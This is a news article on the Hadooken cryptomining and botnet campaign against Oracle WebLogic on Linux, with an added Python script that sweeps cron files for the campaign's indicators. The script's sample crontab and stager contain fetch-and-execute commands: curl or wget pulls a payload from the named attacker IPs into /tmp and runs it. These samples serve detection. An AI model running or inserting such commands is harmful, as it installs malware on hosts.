Cybersecurity researchers have discovered a new malware campaign, dubbed Hadooken, that targets Linux environments to conduct illicit cryptocurrency mining.
Hadooken and Cryptocurrency Theft
The attack, which specifically targets Oracle WebLogic Server, is designed to distribute malware called Hadooken, according to cloud security firm Aqua.
“When Hadooken is executed, it releases a Tsunami malware and installs a cryptocurrency miner,” said security researcher Assaf Morag.
Attack chains exploit known security vulnerabilities and misconfigurations, such as weak credentials, to gain an initial foothold and execute arbitrary code on vulnerable instances.
This is accomplished by launching two nearly identical payloads, one written in Python and the other a shell script, both responsible for retrieving the Hadooken malware from a remote server (“89.185.85[.]102” or “185.174.136[.]204”).
“Additionally, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers,” said Morag, who added: “It then moves laterally within the organization or connected environments to further spread the Hadooken malware.”
Hadooken includes two components: a cryptocurrency miner and a Distributed Denial-of-Service (DDoS) botnet called Tsunami (also known as Kaiten), which has previously been used in attacks on Jenkins and WebLogic services deployed in Kubernetes clusters.
The malware also establishes persistence on the host by creating cron jobs that periodically run the cryptocurrency miner at varying frequencies.
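The attack chain above leaves two host-side traces a responder can sweep for: the download hosts contacted by the Python and shell stagers, and cron entries that relaunch the miner. The following is an added example, not Aqua's tooling or anything from the campaign itself. Only the two IP addresses, the existence of shell/Python downloaders, and the cron-based persistence are taken from the article; the heuristics for temp-directory execution and raw-IP downloads, and all sample file contents, are this example's own constructed assumptions.

```python
"""
IOC and persistence sweep for the Hadooken campaign described above.

Added example, not Aqua's tooling. Facts taken from the article: the two
download hosts (89.185.85[.]102 and 185.174.136[.]204), the shell/Python
downloaders, and cron-based persistence of the miner. The temp-directory and
raw-IP heuristics and the sample file contents are constructed assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional

# Indicators from the article, with the defanging brackets removed for matching.
IOC_IPS = {"89.185.85.102", "185.174.136.204"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Typical downloader verbs in shell or Python stagers (heuristic, assumed).
FETCH_RE = re.compile(r"\b(curl|wget|urllib|requests\.get|urlopen)\b")
# World-writable directories droppers commonly stage from (heuristic, assumed).
VOLATILE_RE = re.compile(r"(?:^|[\s=;&|])(?:/tmp|/var/tmp|/dev/shm)/")


@dataclass
class Finding:
    source: str
    line_no: int
    reason: str
    text: str


def classify(line: str) -> Optional[str]:
    """Return a reason string if the line is suspicious, else None."""
    ips = set(IP_RE.findall(line))
    if ips & IOC_IPS:
        return "known Hadooken download host"
    if VOLATILE_RE.search(line):
        return "references a world-writable temp directory"
    if FETCH_RE.search(line):
        # A raw public IP in a download command is unusual for legitimate jobs.
        for ip in ips:
            try:
                if ipaddress.ip_address(ip).is_global:
                    return "downloader contacting a raw public IP"
            except ValueError:
                continue
    return None


def scan_text(source: str, text: str) -> List[Finding]:
    """Scan crontab or script content line by line, skipping comments."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reason = classify(stripped)
        if reason:
            findings.append(Finding(source, n, reason, stripped))
    return findings


def scan_files(paths: List[str]) -> List[Finding]:
    """Sweep real cron locations on a host; unreadable paths are skipped."""
    findings = []
    for p in paths:
        targets = sorted(Path(p).glob("*")) if Path(p).is_dir() else [Path(p)]
        for f in targets:
            try:
                findings += scan_text(str(f), f.read_text(errors="replace"))
            except OSError:
                continue
    return findings


# Constructed samples, not real captures from the campaign.
SAMPLE_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/7 * * * * root /dev/shm/.x/miner --config /dev/shm/.x/cfg.json
@reboot root curl -s http://89.185.85.102/h -o /tmp/h && sh /tmp/h
0 3 * * * root wget -q https://mirror.example.org/updates.tar.gz
"""

SAMPLE_STAGER = """\
#!/bin/sh
wget -q -O /tmp/c 185.174.136.204/c
chmod +x /tmp/c
/tmp/c
"""

if __name__ == "__main__":
    for f in scan_text("crontab", SAMPLE_CRONTAB) + scan_text("stager", SAMPLE_STAGER):
        print(f"{f.source}:{f.line_no} [{f.reason}] {f.text}")
    # On a live host: scan_files(["/etc/crontab", "/etc/cron.d", "/var/spool/cron/crontabs"])
```

The IOC match is the only high-confidence signal; the temp-directory and raw-IP rules are triage heuristics that will also fire on legitimate but sloppy jobs, so treat them as review candidates rather than verdicts. Run `scan_files` as root against the standard cron locations, and remember that the campaign also harvests SSH material, so a clean cron sweep on one host says nothing about the hosts reachable from it.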
Aqua observed that the IP address 89.185.85[.]102 is registered in Germany under the hosting company Aeza International LTD (AS210644). Earlier research by Uptycs, from February 2024, links the same address to a cryptocurrency mining campaign conducted by the 8220 Gang that exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.
The second IP address, 185.174.136[.]204, currently inactive, is also linked to Aeza Group Ltd. (AS216246). As highlighted by Qurium and EU DisinfoLab in July 2024, Aeza is a “bulletproof” hosting provider with a presence at the Moscow M9 facility and two data centers in Frankfurt.
“Aeza’s modus operandi and rapid growth can be explained by the recruitment of young developers affiliated with ‘bulletproof’ hosting providers in Russia that provide shelter for cybercrime,” the researchers said in the report.
Yet Another Malware on Linux: Do You Need an Antivirus?
Yet another piece of malware discovered on Linux, like Hadooken, reignites the debate over whether an antivirus is actually needed on this operating system. Traditionally considered more secure than Windows, Linux has often been perceived as an environment less exposed to cyber threats.
However, the rise of targeted malware, especially in specific contexts such as servers and cloud environments, calls this “intrinsic” security into question. While antivirus adoption on Linux desktops remains uncommon, on servers and corporate infrastructure it can serve as an additional defensive layer against increasingly sophisticated attacks, particularly for protecting credentials and ensuring continuity of service.
The classic free and open source example is ClamAV. However, configuring it for real-time (on-access) scanning is difficult for inexperienced users, which limits its adoption at home or among those without advanced technical skills.
Fun facts about the name Hadooken
The malware’s name “Hadooken” appears to be a nod to the famous special move from the video game Street Fighter known as “Hadouken.” The move, performed by the character Ryu, launches a powerful energy ball at opponents; besides Ryu, it is also used by Ken and Sakura.
The term itself is of Japanese origin and means “wave fist” (波動拳), referring to a rapid and devastating attack. The video game connection may have been chosen to evoke the idea of an equally rapid and effective attack against the targeted systems.